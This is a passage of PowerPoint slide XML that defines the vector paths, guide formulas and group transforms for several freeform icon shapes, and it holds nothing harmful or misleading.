                <a:gd name="T8" fmla="*/ 46 w 143"/>
                <a:gd name="T9" fmla="*/ 10 h 140"/>
                <a:gd name="T10" fmla="*/ 133 w 143"/>
                <a:gd name="T11" fmla="*/ 97 h 140"/>
                <a:gd name="T12" fmla="*/ 133 w 143"/>
                <a:gd name="T13" fmla="*/ 133 h 140"/>
                <a:gd name="T14" fmla="*/ 115 w 143"/>
                <a:gd name="T1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0">
                  <a:moveTo>
                    <a:pt x="115" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="140"/>
                    <a:pt x="102" y="138"/>
                    <a:pt x="97" y="133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0" y="36"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="10" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="36" y="0"/>
                    <a:pt x="46" y="10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43" y="107"/>
                    <a:pt x="143" y="123"/>
                    <a:pt x="133" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="138"/>
                    <a:pt x="122" y="140"/>
                    <a:pt x="115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03" name="Freeform 1042">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E744D2-07EF-5240-9A59-E464A9FBA3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72699" y="4827231"/>
              <a:ext cx="180123" cy="175299"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 333 w 450"/>
                <a:gd name="T1" fmla="*/ 440 h 440"/>
                <a:gd name="T2" fmla="*/ 258 w 450"/>
                <a:gd name="T3" fmla="*/ 409 h 440"/>
                <a:gd name="T4" fmla="*/ 41 w 450"/>
                <a:gd name="T5" fmla="*/ 191 h 440"/>
                <a:gd name="T6" fmla="*/ 41 w 450"/>
                <a:gd name="T7" fmla="*/ 41 h 440"/>
                <a:gd name="T8" fmla="*/ 191 w 450"/>
                <a:gd name="T9" fmla="*/ 41 h 440"/>
                <a:gd name="T10" fmla="*/ 408 w 450"/>
                <a:gd name="T11" fmla="*/ 259 h 440"/>
                <a:gd name="T12" fmla="*/ 408 w 450"/>
                <a:gd name="T13" fmla="*/ 409 h 440"/>
                <a:gd name="T14" fmla="*/ 333 w 450"/>
                <a:gd name="T15" fmla="*/ 440 h 440"/>
                <a:gd name="T16" fmla="*/ 116 w 450"/>
                <a:gd name="T17" fmla="*/ 61 h 440"/>
                <a:gd name="T18" fmla="*/ 77 w 450"/>
                <a:gd name="T19" fmla="*/ 77 h 440"/>
                <a:gd name="T20" fmla="*/ 77 w 450"/>
                <a:gd name="T21" fmla="*/ 156 h 440"/>
                <a:gd name="T22" fmla="*/ 294 w 450"/>
                <a:gd name="T23" fmla="*/ 373 h 440"/>
                <a:gd name="T24" fmla="*/ 372 w 450"/>
                <a:gd name="T25" fmla="*/ 373 h 440"/>
                <a:gd name="T26" fmla="*/ 372 w 450"/>
                <a:gd name="T27" fmla="*/ 295 h 440"/>
                <a:gd name="T28" fmla="*/ 155 w 450"/>
                <a:gd name="T29" fmla="*/ 77 h 440"/>
                <a:gd name="T30" fmla="*/ 116 w 450"/>
                <a:gd name="T31" fmla="*/ 6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0" h="440">
                  <a:moveTo>
                    <a:pt x="333" y="440"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="306" y="440"/>
                    <a:pt x="279" y="430"/>
                    <a:pt x="258" y="409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0" y="150"/>
                    <a:pt x="0" y="83"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="0"/>
                    <a:pt x="149" y="0"/>
                    <a:pt x="191" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="408" y="259"/>
                    <a:pt x="408" y="259"/>
                    <a:pt x="408" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="450" y="300"/>
                    <a:pt x="450" y="368"/>
                    <a:pt x="408" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="430"/>
                    <a:pt x="360" y="440"/>
                    <a:pt x="333" y="440"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="61"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="61"/>
                    <a:pt x="87" y="67"/>
                    <a:pt x="77" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="99"/>
                    <a:pt x="55" y="134"/>
                    <a:pt x="77" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="373"/>
                    <a:pt x="294" y="373"/>
                    <a:pt x="294" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="395"/>
                    <a:pt x="351" y="395"/>
                    <a:pt x="372" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="394" y="351"/>
                    <a:pt x="394" y="316"/>
                    <a:pt x="372" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="77"/>
                    <a:pt x="155" y="77"/>
                    <a:pt x="155" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="130" y="61"/>
                    <a:pt x="11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F503D4-130B-CB46-906E-7D30F4395E72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8406350" y="1854391"/>
            <a:ext cx="425105" cy="422252"/>
            <a:chOff x="8406350" y="1854391"/>
            <a:chExt cx="425105" cy="422252"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="126" name="Freeform 765">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A1CA70D-3080-7B4C-A97D-A9A74D2E22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17476" y="1854391"/>
              <a:ext cx="84641" cy="67522"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 163 w 353"/>
                <a:gd name="T1" fmla="*/ 284 h 284"/>
                <a:gd name="T2" fmla="*/ 140 w 353"/>
                <a:gd name="T3" fmla="*/ 270 h 284"/>
                <a:gd name="T4" fmla="*/ 152 w 353"/>
                <a:gd name="T5" fmla="*/ 235 h 284"/>
                <a:gd name="T6" fmla="*/ 268 w 353"/>
                <a:gd name="T7" fmla="*/ 179 h 284"/>
                <a:gd name="T8" fmla="*/ 18 w 353"/>
                <a:gd name="T9" fmla="*/ 53 h 284"/>
                <a:gd name="T10" fmla="*/ 7 w 353"/>
                <a:gd name="T11" fmla="*/ 18 h 284"/>
                <a:gd name="T12" fmla="*/ 42 w 353"/>
                <a:gd name="T13" fmla="*/ 7 h 284"/>
                <a:gd name="T14" fmla="*/ 339 w 353"/>
                <a:gd name="T15" fmla="*/ 157 h 284"/>
                <a:gd name="T16" fmla="*/ 353 w 353"/>
                <a:gd name="T17" fmla="*/ 180 h 284"/>
                <a:gd name="T18" fmla="*/ 338 w 353"/>
                <a:gd name="T19" fmla="*/ 203 h 284"/>
                <a:gd name="T20" fmla="*/ 174 w 353"/>
                <a:gd name="T21" fmla="*/ 282 h 284"/>
                <a:gd name="T22" fmla="*/ 163 w 353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3" h="284">
                  <a:moveTo>
                    <a:pt x="163" y="284"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="284"/>
                    <a:pt x="144" y="279"/>
                    <a:pt x="140" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="257"/>
                    <a:pt x="139" y="241"/>
                    <a:pt x="152" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268" y="179"/>
                    <a:pt x="268" y="179"/>
                    <a:pt x="268" y="17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6" y="47"/>
                    <a:pt x="0" y="31"/>
                    <a:pt x="7" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="6"/>
                    <a:pt x="29" y="0"/>
                    <a:pt x="42" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339" y="157"/>
                    <a:pt x="339" y="157"/>
                    <a:pt x="339" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="161"/>
                    <a:pt x="353" y="170"/>
                    <a:pt x="353" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="190"/>
                    <a:pt x="347" y="199"/>
                    <a:pt x="338" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="282"/>
                    <a:pt x="174" y="282"/>
                    <a:pt x="174" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="284"/>
                    <a:pt x="167" y="284"/>
                    <a:pt x="163" y="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27" name="Freeform 767">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AF44B1A-EC18-F842-B21A-681A6739D0A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40444" y="1855342"/>
              <a:ext cx="99857" cy="87494"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 333 w 421"/>
                <a:gd name="T1" fmla="*/ 371 h 371"/>
                <a:gd name="T2" fmla="*/ 322 w 421"/>
                <a:gd name="T3" fmla="*/ 368 h 371"/>
                <a:gd name="T4" fmla="*/ 15 w 421"/>
                <a:gd name="T5" fmla="*/ 215 h 371"/>
                <a:gd name="T6" fmla="*/ 0 w 421"/>
                <a:gd name="T7" fmla="*/ 192 h 371"/>
                <a:gd name="T8" fmla="*/ 15 w 421"/>
                <a:gd name="T9" fmla="*/ 169 h 371"/>
                <a:gd name="T10" fmla="*/ 344 w 421"/>
                <a:gd name="T11" fmla="*/ 6 h 371"/>
                <a:gd name="T12" fmla="*/ 378 w 421"/>
                <a:gd name="T13" fmla="*/ 17 h 371"/>
                <a:gd name="T14" fmla="*/ 367 w 421"/>
                <a:gd name="T15" fmla="*/ 52 h 371"/>
                <a:gd name="T16" fmla="*/ 84 w 421"/>
                <a:gd name="T17" fmla="*/ 192 h 371"/>
                <a:gd name="T18" fmla="*/ 333 w 421"/>
                <a:gd name="T19" fmla="*/ 316 h 371"/>
                <a:gd name="T20" fmla="*/ 379 w 421"/>
                <a:gd name="T21" fmla="*/ 292 h 371"/>
                <a:gd name="T22" fmla="*/ 414 w 421"/>
                <a:gd name="T23" fmla="*/ 303 h 371"/>
                <a:gd name="T24" fmla="*/ 403 w 421"/>
                <a:gd name="T25" fmla="*/ 338 h 371"/>
                <a:gd name="T26" fmla="*/ 345 w 421"/>
                <a:gd name="T27" fmla="*/ 368 h 371"/>
                <a:gd name="T28" fmla="*/ 333 w 421"/>
                <a:gd name="T2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1" h="371">
                  <a:moveTo>
                    <a:pt x="333" y="371"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="371"/>
                    <a:pt x="326" y="370"/>
                    <a:pt x="322" y="368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6" y="211"/>
                    <a:pt x="0" y="202"/>
                    <a:pt x="0" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="182"/>
                    <a:pt x="6" y="173"/>
                    <a:pt x="15" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="6"/>
                    <a:pt x="344" y="6"/>
                    <a:pt x="344" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="0"/>
                    <a:pt x="372" y="5"/>
                    <a:pt x="378" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="385" y="30"/>
                    <a:pt x="379" y="46"/>
                    <a:pt x="367" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="192"/>
                    <a:pt x="84" y="192"/>
                    <a:pt x="84" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="316"/>
                    <a:pt x="333" y="316"/>
                    <a:pt x="333" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="292"/>
                    <a:pt x="379" y="292"/>
                    <a:pt x="379" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="285"/>
                    <a:pt x="407" y="290"/>
                    <a:pt x="414" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="421" y="315"/>
                    <a:pt x="416" y="331"/>
                    <a:pt x="403" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="368"/>
                    <a:pt x="345" y="368"/>
                    <a:pt x="345" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="342" y="370"/>
                    <a:pt x="338" y="371"/>
                    <a:pt x="333" y="3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1790" tIns="20895" rIns="41790" bIns="20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9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51EC9CA-08A8-104C-B3E7-E1D305E681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06350" y="1891481"/>
              <a:ext cx="425105" cy="385162"/>
              <a:chOff x="1515221" y="5494379"/>
              <a:chExt cx="425105" cy="385162"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129" name="Freeform 764">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A966D160-8387-BB47-AB5D-064E45F9C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9315" y="5494379"/>
                <a:ext cx="161673" cy="145506"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 333 w 678"/>
                  <a:gd name="T1" fmla="*/ 615 h 615"/>
                  <a:gd name="T2" fmla="*/ 321 w 678"/>
                  <a:gd name="T3" fmla="*/ 612 h 615"/>
                  <a:gd name="T4" fmla="*/ 15 w 678"/>
                  <a:gd name="T5" fmla="*/ 436 h 615"/>
                  <a:gd name="T6" fmla="*/ 2 w 678"/>
                  <a:gd name="T7" fmla="*/ 413 h 615"/>
                  <a:gd name="T8" fmla="*/ 0 w 678"/>
                  <a:gd name="T9" fmla="*/ 38 h 615"/>
                  <a:gd name="T10" fmla="*/ 26 w 678"/>
                  <a:gd name="T11" fmla="*/ 12 h 615"/>
                  <a:gd name="T12" fmla="*/ 26 w 678"/>
                  <a:gd name="T13" fmla="*/ 12 h 615"/>
                  <a:gd name="T14" fmla="*/ 52 w 678"/>
                  <a:gd name="T15" fmla="*/ 38 h 615"/>
                  <a:gd name="T16" fmla="*/ 54 w 678"/>
                  <a:gd name="T17" fmla="*/ 398 h 615"/>
                  <a:gd name="T18" fmla="*/ 334 w 678"/>
                  <a:gd name="T19" fmla="*/ 559 h 615"/>
                  <a:gd name="T20" fmla="*/ 626 w 678"/>
                  <a:gd name="T21" fmla="*/ 397 h 615"/>
                  <a:gd name="T22" fmla="*/ 626 w 678"/>
                  <a:gd name="T23" fmla="*/ 26 h 615"/>
                  <a:gd name="T24" fmla="*/ 652 w 678"/>
                  <a:gd name="T25" fmla="*/ 0 h 615"/>
                  <a:gd name="T26" fmla="*/ 678 w 678"/>
                  <a:gd name="T27" fmla="*/ 26 h 615"/>
                  <a:gd name="T28" fmla="*/ 678 w 678"/>
                  <a:gd name="T29" fmla="*/ 412 h 615"/>
                  <a:gd name="T30" fmla="*/ 665 w 678"/>
                  <a:gd name="T31" fmla="*/ 435 h 615"/>
                  <a:gd name="T32" fmla="*/ 346 w 678"/>
                  <a:gd name="T33" fmla="*/ 612 h 615"/>
                  <a:gd name="T34" fmla="*/ 333 w 678"/>
                  <a:gd name="T35" fmla="*/ 615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8" h="615">
                    <a:moveTo>
                      <a:pt x="333" y="615"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="329" y="615"/>
                      <a:pt x="325" y="614"/>
                      <a:pt x="321" y="612"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="436"/>
                      <a:pt x="15" y="436"/>
                      <a:pt x="15" y="436"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="431"/>
                      <a:pt x="3" y="423"/>
                      <a:pt x="2" y="413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24"/>
                      <a:pt x="12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40" y="12"/>
                      <a:pt x="52" y="24"/>
                      <a:pt x="52" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="398"/>
                      <a:pt x="54" y="398"/>
                      <a:pt x="54" y="398"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="334" y="559"/>
                      <a:pt x="334" y="559"/>
                      <a:pt x="334" y="559"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="626" y="397"/>
                      <a:pt x="626" y="397"/>
                      <a:pt x="626" y="397"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="626" y="26"/>
                      <a:pt x="626" y="26"/>
                      <a:pt x="626" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="626" y="12"/>
                      <a:pt x="638" y="0"/>
                      <a:pt x="652" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="666" y="0"/>
                      <a:pt x="678" y="12"/>
                      <a:pt x="678" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="678" y="412"/>
                      <a:pt x="678" y="412"/>
                      <a:pt x="678" y="412"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="678" y="421"/>
                      <a:pt x="673" y="430"/>
                      <a:pt x="665" y="435"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="346" y="612"/>
                      <a:pt x="346" y="612"/>
                      <a:pt x="346" y="612"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="342" y="614"/>
                      <a:pt x="338" y="615"/>
                      <a:pt x="333" y="6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1790" tIns="20895" rIns="41790" bIns="208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962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30" name="Freeform 768">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52340583-EB11-494C-B6EB-43BAD4D38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2543" y="5533370"/>
                <a:ext cx="12364" cy="106514"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 51"/>
                  <a:gd name="T1" fmla="*/ 450 h 450"/>
                  <a:gd name="T2" fmla="*/ 0 w 51"/>
                  <a:gd name="T3" fmla="*/ 424 h 450"/>
                  <a:gd name="T4" fmla="*/ 0 w 51"/>
                  <a:gd name="T5" fmla="*/ 26 h 450"/>
                  <a:gd name="T6" fmla="*/ 25 w 51"/>
                  <a:gd name="T7" fmla="*/ 0 h 450"/>
                  <a:gd name="T8" fmla="*/ 51 w 51"/>
                  <a:gd name="T9" fmla="*/ 26 h 450"/>
                  <a:gd name="T10" fmla="*/ 51 w 51"/>
                  <a:gd name="T11" fmla="*/ 424 h 450"/>
                  <a:gd name="T12" fmla="*/ 25 w 51"/>
                  <a:gd name="T13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450">
                    <a:moveTo>
                      <a:pt x="25" y="450"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="450"/>
                      <a:pt x="0" y="438"/>
                      <a:pt x="0" y="42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5" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="51" y="12"/>
                      <a:pt x="51" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="424"/>
                      <a:pt x="51" y="424"/>
                      <a:pt x="51" y="424"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="438"/>
                      <a:pt x="40" y="450"/>
                      <a:pt x="25" y="4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1790" tIns="20895" rIns="41790" bIns="208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962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31" name="Freeform 769">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D84B5F-9228-A74B-B837-D954D4926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6172" y="5729280"/>
                <a:ext cx="160722" cy="146457"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 344 w 677"/>
                  <a:gd name="T1" fmla="*/ 615 h 615"/>
                  <a:gd name="T2" fmla="*/ 331 w 677"/>
                  <a:gd name="T3" fmla="*/ 612 h 615"/>
                  <a:gd name="T4" fmla="*/ 13 w 677"/>
                  <a:gd name="T5" fmla="*/ 435 h 615"/>
                  <a:gd name="T6" fmla="*/ 0 w 677"/>
                  <a:gd name="T7" fmla="*/ 412 h 615"/>
                  <a:gd name="T8" fmla="*/ 0 w 677"/>
                  <a:gd name="T9" fmla="*/ 26 h 615"/>
                  <a:gd name="T10" fmla="*/ 25 w 677"/>
                  <a:gd name="T11" fmla="*/ 0 h 615"/>
                  <a:gd name="T12" fmla="*/ 51 w 677"/>
                  <a:gd name="T13" fmla="*/ 26 h 615"/>
                  <a:gd name="T14" fmla="*/ 51 w 677"/>
                  <a:gd name="T15" fmla="*/ 397 h 615"/>
                  <a:gd name="T16" fmla="*/ 344 w 677"/>
                  <a:gd name="T17" fmla="*/ 560 h 615"/>
                  <a:gd name="T18" fmla="*/ 623 w 677"/>
                  <a:gd name="T19" fmla="*/ 398 h 615"/>
                  <a:gd name="T20" fmla="*/ 625 w 677"/>
                  <a:gd name="T21" fmla="*/ 38 h 615"/>
                  <a:gd name="T22" fmla="*/ 651 w 677"/>
                  <a:gd name="T23" fmla="*/ 13 h 615"/>
                  <a:gd name="T24" fmla="*/ 651 w 677"/>
                  <a:gd name="T25" fmla="*/ 13 h 615"/>
                  <a:gd name="T26" fmla="*/ 677 w 677"/>
                  <a:gd name="T27" fmla="*/ 39 h 615"/>
                  <a:gd name="T28" fmla="*/ 675 w 677"/>
                  <a:gd name="T29" fmla="*/ 414 h 615"/>
                  <a:gd name="T30" fmla="*/ 662 w 677"/>
                  <a:gd name="T31" fmla="*/ 436 h 615"/>
                  <a:gd name="T32" fmla="*/ 357 w 677"/>
                  <a:gd name="T33" fmla="*/ 612 h 615"/>
                  <a:gd name="T34" fmla="*/ 344 w 677"/>
                  <a:gd name="T35" fmla="*/ 615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7" h="615">
                    <a:moveTo>
                      <a:pt x="344" y="615"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="340" y="615"/>
                      <a:pt x="335" y="614"/>
                      <a:pt x="331" y="612"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="435"/>
                      <a:pt x="13" y="435"/>
                      <a:pt x="13" y="435"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="430"/>
                      <a:pt x="0" y="422"/>
                      <a:pt x="0" y="41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5" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="51" y="12"/>
                      <a:pt x="51" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="397"/>
                      <a:pt x="51" y="397"/>
                      <a:pt x="51" y="397"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="344" y="560"/>
                      <a:pt x="344" y="560"/>
                      <a:pt x="344" y="560"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="623" y="398"/>
                      <a:pt x="623" y="398"/>
                      <a:pt x="623" y="398"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="625" y="38"/>
                      <a:pt x="625" y="38"/>
                      <a:pt x="625" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="625" y="24"/>
                      <a:pt x="637" y="13"/>
                      <a:pt x="651" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="651" y="13"/>
                      <a:pt x="651" y="13"/>
                      <a:pt x="651" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="666" y="13"/>
                      <a:pt x="677" y="24"/>
                      <a:pt x="677" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="675" y="414"/>
                      <a:pt x="675" y="414"/>
                      <a:pt x="675" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="675" y="423"/>
                      <a:pt x="670" y="431"/>
                      <a:pt x="662" y="436"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="357" y="612"/>
                      <a:pt x="357" y="612"/>
                      <a:pt x="357" y="612"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="353" y="614"/>
                      <a:pt x="348" y="615"/>
                      <a:pt x="344" y="6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1790" tIns="20895" rIns="41790" bIns="208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962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32" name="Freeform 770">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{358067AC-8AA2-004F-BF39-EE62B190EB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5221" y="5693141"/>
                <a:ext cx="83690" cy="67522"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 190 w 353"/>
                  <a:gd name="T1" fmla="*/ 284 h 284"/>
                  <a:gd name="T2" fmla="*/ 179 w 353"/>
                  <a:gd name="T3" fmla="*/ 281 h 284"/>
                  <a:gd name="T4" fmla="*/ 15 w 353"/>
                  <a:gd name="T5" fmla="*/ 202 h 284"/>
                  <a:gd name="T6" fmla="*/ 1 w 353"/>
                  <a:gd name="T7" fmla="*/ 179 h 284"/>
                  <a:gd name="T8" fmla="*/ 15 w 353"/>
                  <a:gd name="T9" fmla="*/ 156 h 284"/>
                  <a:gd name="T10" fmla="*/ 312 w 353"/>
                  <a:gd name="T11" fmla="*/ 6 h 284"/>
                  <a:gd name="T12" fmla="*/ 346 w 353"/>
                  <a:gd name="T13" fmla="*/ 18 h 284"/>
                  <a:gd name="T14" fmla="*/ 335 w 353"/>
                  <a:gd name="T15" fmla="*/ 52 h 284"/>
                  <a:gd name="T16" fmla="*/ 85 w 353"/>
                  <a:gd name="T17" fmla="*/ 178 h 284"/>
                  <a:gd name="T18" fmla="*/ 201 w 353"/>
                  <a:gd name="T19" fmla="*/ 234 h 284"/>
                  <a:gd name="T20" fmla="*/ 213 w 353"/>
                  <a:gd name="T21" fmla="*/ 269 h 284"/>
                  <a:gd name="T22" fmla="*/ 190 w 353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3" h="284">
                    <a:moveTo>
                      <a:pt x="190" y="284"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="186" y="284"/>
                      <a:pt x="182" y="283"/>
                      <a:pt x="179" y="281"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="202"/>
                      <a:pt x="15" y="202"/>
                      <a:pt x="15" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="198"/>
                      <a:pt x="1" y="189"/>
                      <a:pt x="1" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="169"/>
                      <a:pt x="6" y="160"/>
                      <a:pt x="15" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="6"/>
                      <a:pt x="312" y="6"/>
                      <a:pt x="312" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="324" y="0"/>
                      <a:pt x="340" y="5"/>
                      <a:pt x="346" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="353" y="30"/>
                      <a:pt x="348" y="46"/>
                      <a:pt x="335" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="178"/>
                      <a:pt x="85" y="178"/>
                      <a:pt x="85" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="234"/>
                      <a:pt x="201" y="234"/>
                      <a:pt x="201" y="234"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="241"/>
                      <a:pt x="220" y="256"/>
                      <a:pt x="213" y="269"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="278"/>
                      <a:pt x="200" y="284"/>
                      <a:pt x="190" y="2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1790" tIns="20895" rIns="41790" bIns="208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962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33" name="Freeform 772">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0E7F43-541A-3F44-BEE4-02196DE64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037" y="5693141"/>
                <a:ext cx="99857" cy="87494"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 87 w 420"/>
